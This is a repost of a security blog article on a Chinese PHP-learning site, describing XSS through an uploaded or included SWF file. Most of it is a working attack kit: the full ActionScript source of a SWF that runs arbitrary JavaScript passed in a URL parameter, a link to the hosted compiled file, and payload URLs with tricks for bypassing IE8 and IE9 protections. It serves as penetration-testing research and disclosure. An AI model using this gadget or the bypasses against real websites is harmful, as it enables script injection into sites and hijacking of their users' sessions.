网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

XSS by uploading/including a SWF file - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 10:15 作者: 阅读:

[导读] On November 12, 2012, in Security Articles, Security Posts, by Soroush DaliliAs you may already know, it is possible to make a website vulnerable to XSS if you can upl......

On November 12, 2012, in Security Articles, Security Posts, by Soroush Dalili
As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
 
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
 
Note: IE has a protection to make the “document” object inaccessible when you open a SWF directly in a browser. I have bypassed IE8 protection by using a simple redirection in Javascript. I have also found a noisy way to bypass IE9 protection by opening a new window (you may be able to do it in a less noisy way – please leave your comments if you know any other bypass method).
 
Here is the actionscript code:
 

package
{
    import flash.display.Sprite;
    import flash.external.*;
    import flash.system.System;
    public class XSSProject extends Sprite
    {
        public function XSSProject()
        {
            flash.system.Security.allowDomain("*");
            ExternalInterface.marshallExceptions = true;
            try {
                ExternalInterface.call("0);}catch(e){};"+root.loaderInfo.parameters.js+"///*PoC by Soroush Dalili @IRSDL - only for testing/educational purposes - He accepts no responsibility for any bad/malicious usage*/");
            } catch(e:Error) {
                trace(e);
            }
        }
    }
}

 
Compiled file is accessbile via: http://0me.me/demo/xss/xssproject.swf
 
Examples:
 
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
 
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
 
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
 
References:
 
[1] The other reason to beware ExternalInterface.call() (URL: http://lcamtuf.blogspot.co.uk/2011/03/other-reason-to-beware-of.html)
 
[2] Flash ExternalInterface.call() JavaScript Injection – can make the websites vulnerable to XSS (URL:http://soroush.secproject.com/blog/2011/03/flash-externalinterface-call-javascript-injection-%E2%80%93-can-make-the-websites-vulnerable-to-xss/)
 
from:http://soroush.secproject.com/blog/2012/11/xss-by-uploadingincluding-a-swf-file/

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论